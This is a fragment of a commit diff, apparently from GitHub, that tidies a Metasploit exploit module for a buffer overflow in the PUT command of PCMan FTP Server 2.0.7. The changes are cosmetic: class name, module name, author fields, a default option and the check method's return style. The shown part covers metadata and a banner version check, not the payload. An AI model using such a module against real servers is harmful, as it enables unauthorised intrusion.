5
5
6
6
require 'msf/core'
7
7
8
- class Metasploit3 < Msf ::Exploit ::Remote
8
+ class Metasploit4 < Msf ::Exploit ::Remote
9
9
Rank = NormalRanking
10
10
11
11
include Msf ::Exploit ::Remote ::Ftp
12
12
13
13
def initialize ( info = { } )
14
14
super ( update_info ( info ,
15
- 'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command' ,
15
+ 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command' ,
16
16
'Description' => %q{
17
17
This module exploits a buffer overflow vulnerability found in the PUT command of the
18
18
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
19
19
credientials are enabled.
20
20
} ,
21
21
'Author' =>
22
22
[
23
- 'Jay Turla @shipcod3 ' , # Initial Discovery
24
- 'Chris Higgins @ch1gg1ns ' # msf Module
23
+ 'Jay Turla' , # Initial Discovery -- @shipcod3
24
+ 'Chris Higgins' # msf Module -- @ch1gg1ns
25
25
] ,
26
26
'License' => MSF_LICENSE ,
27
27
'References' =>
@@ -30,8 +30,7 @@ def initialize(info = {})
30
30
] ,
31
31
'DefaultOptions' =>
32
32
{
33
- 'EXITFUNC' => 'process' ,
34
- 'VERBOSE' => true
33
+ 'EXITFUNC' => 'process'
35
34
} ,
36
35
'Payload' =>
37
36
{
@@ -57,9 +56,9 @@ def check
57
56
disconnect
58
57
59
58
if /220 PCMan's FTP Server 2\. 0/ === banner
60
- return Exploit ::CheckCode ::Appears
59
+ Exploit ::CheckCode ::Appears
61
60
else
62
- return Exploit ::CheckCode ::Safe
61
+ Exploit ::CheckCode ::Safe
63
62
end
64
63
end
65
64
0 commit comments